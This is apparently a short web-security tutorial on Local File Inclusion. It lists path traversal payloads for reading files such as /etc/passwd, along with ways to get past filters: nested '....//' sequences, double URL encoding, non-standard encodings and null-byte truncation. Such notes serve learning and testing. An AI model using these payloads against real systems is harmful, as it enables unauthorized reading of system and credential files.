Local File Inclusion
PRACTICE ! PRACTICE ! PRACTICE !
Last updated
PRACTICE ! PRACTICE ! PRACTICE !
Last updated
Suppose for an example, we could render an image from a website which runs an application in the backend.
Ususally images are loaded to render via some html links and the below code explains
The loadImage takes a filename parameter and returns a content of the specified file.
In Linux, the images are stored in a permanent disk
/var/www/imagesby default
Sample example of a Linux and Windows based LFI exploit !
Now when we try to use the dots and slashes sequence, we get a 404 error saying it's not found. This means the application which is running in the background strips or blocks directory traversal sequence from the user-supplied filename that is :)
It blocks the dot sequence, which makes us even more easy to exploit it by just giving the exact filesystem path such as => /etc/passwd.
If the previous two methods don't work, we can try a series of Nested Traversal Sequence of dots and slashes.
....// or ....\/
Which will simply, revert travel sequences when the inner sequence is stripped by the backend.
NOTE => The sequence must be two dots and slashes.
If none of the above methods work, then we'll have to end up encoding our sequential payload.
The filename parameter of a
multipart/form-datarequest strips the directory sequence before passing it to the backend, It then performs a URL-decode of the input before using it.
To bypass this kind of sanitization, we can double encode our characters.
Various non-standard encodings, such as ..%c0%af or ..%ef%bc%8f, may also work in some cases.
If the backend sanitizes the user supplied input with respect to the specified extension then we'll have to use the NULL Byte %00 to effectively terminate file path before the required extension.
